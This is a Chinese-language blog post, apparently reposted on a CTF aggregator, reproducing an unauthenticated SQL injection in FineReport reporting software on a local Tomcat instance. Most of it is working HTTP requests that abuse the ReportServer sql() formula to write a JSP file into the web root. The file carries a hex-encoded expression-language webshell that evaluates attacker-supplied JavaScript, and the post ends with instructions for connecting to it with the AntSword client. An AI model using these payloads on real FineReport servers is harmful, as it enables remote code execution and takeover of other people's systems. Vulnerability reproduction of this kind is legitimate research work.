CTF导航 CTF导航

帆软报表最新前台SQL漏洞复现

渗透技巧 1个月前 admin
104 0 0

环境搭建

从官网上下载环境

https://www.finereport.com/product/download/redirect?version=windows_x64_10.0&token=ydxWtxnCPbX3

帆软报表最新前台SQL漏洞复现

安装好后,将webapps目录中 webroot目录 的复制到 tomcat3 中的webapps目录中

接着启动运行 tomcat

帆软报表最新前台SQL漏洞复现

帆软报表最新前台SQL漏洞复现

帆软报表最新前台SQL漏洞复现

接着运行 apache-tomcat-8.5.87binstartup.bat 就成功搭建环境了

第一次运行 先访问 http://127.0.0.1:8080/webroot/decision  要设置密码,默认内置和外置数据库

帆软报表最新前台SQL漏洞复现

本地测试报错

帆软报表最新前台SQL漏洞复现

配置tomcat server.xml 添加 relaxedQueryChars="[]|{}^\`"<>"

帆软报表最新前台SQL漏洞复现

GET /webroot/decision/view/ReportServer?test=&n=${__fr_locale__=sql('FRDemo',DECODE('%EF%BB%BFATTACH%20DATABASE%20%27..%2Fwebapps%2Fwebroot%2Fasd1.jsp%27%20as%20asd1%3B'),1,1)}${__fr_locale__=sql('FRDemo',DECODE('%EF%BB%BFCREATE%20TABLE%20asd1.exp2%28data%20text%29%3B'),1,1)}${__fr_locale__=sql('FRDemo',DECODE('%EF%BB%BFINSERT%20INTO%20asd1.exp2%28data%29%20VALUES%20%28%27123%27%29%3B'),1,1)} HTTP/1.1
Host: 127.0.0.1:8080

帆软报表最新前台SQL漏洞复现帆软报表最新前台SQL漏洞复现

本地测试写webshell

/webroot/decision/view/ReportServer?test=s&n=${__fr_locale__=sql('FRDemo',DECODE('ATTACH DATABASE '../webapps/webroot/aaa.jsp' as gggggg;'),1,1)}${__fr_locale__=sql('FRDemo',DECODE('CREATE TABLE gggggg.exp2(data text);'),1,1)}${__fr_locale__=sql('FRDemo',DECODE('INSERT INTO gggggg.exp2(data) VALUES (x'247b27272e676574436c61737328292e666f724e616d6528706172616d2e61292e6e6577496e7374616e636528292e676574456e67696e6542794e616d6528276a7327292e6576616c28706172616d2e62297d');'),1,1)}

帆软报表最新前台SQL漏洞复现

GET /webroot/decision/view/ReportServer?test=&n=/webroot/decision/view/ReportServer?test=s&n=${__fr_locale__=sql('FRDemo',DECODE('%EF%BB%BFATTACH%20DATABASE%20%27..%2Fwebapps%2Fwebroot%2Fhelp.jsp%27%20as%20teeeee%3B'),1,1)}${__fr_locale__=sql('FRDemo',DECODE('%EF%BB%BFCREATE%20TABLE%20teeeee.exp2%28data%20text%29%3B'),1,1)}${__fr_locale__=sql('FRDemo',DECODE('%EF%BB%BFINSERT%20INTO%20teeeee.exp2%28data%29%20VALUES%20%28x%27247b27272e676574436c61737328292e666f724e616d6528706172616d2e61292e6e6577496e7374616e636528292e676574456e67696e6542794e616d6528276a7327292e6576616c28706172616d2e62297d%27%29%3B'),1,1)} HTTP/1.1
Host: 127.0.0.1:8080

帆软报表最新前台SQL漏洞复现

帆软报表最新前台SQL漏洞复现

蚁剑进行连接,添加get参数?a=javax.script.ScriptEngineManager,蚁剑连接密码为b,连接类型选择JSPJS

帆软报表最新前台SQL漏洞复现


参考



原文始发于微信公众号(安全逐梦人):帆软报表最新前台SQL漏洞复现

版权声明:admin 发表于 2024年7月26日 下午9:41。
转载请注明:帆软报表最新前台SQL漏洞复现 | CTF导航

相关文章

Cyberdefenders蓝队-恶意软件流量分析3
admin
839
高级技巧:利用Lua编写安全场景的测试数据生成工具
admin
239
每日安全动态推送(11-02)
admin
1,005
云上反弹shell多维检测技术
admin
337
隐秘的角落?红雨滴云沙箱带你揭秘CDN隧道木马
admin
716
零日文基本情報技術者與情報セキュリティマネジメント試験準備心得
admin
552

相关文章

Tomcat CVE-2024-21733漏洞简单复现、分析
0
每周蓝军技术推送(2024.8.31-9.6)
0
每日安全动态推送(9-6)
0
浅谈如何防止他人恶意刷接口
0
web选手入门pwn(19) ——2个字节
0
集权系列科普 | 想了解AD&攻击面?独家干货放送(下)
0
JDK高版本的模块化以及反射类加载限制绕过
0
原创 Paper | 通过杀软 avast 及 no-defender 工具分析 Windows 防护机制
0
【DEFCON & HITB】Bug Hunting In VMware Device Virtualization(上篇)
0
CVE-2024-38106 race condition 漏洞分析
0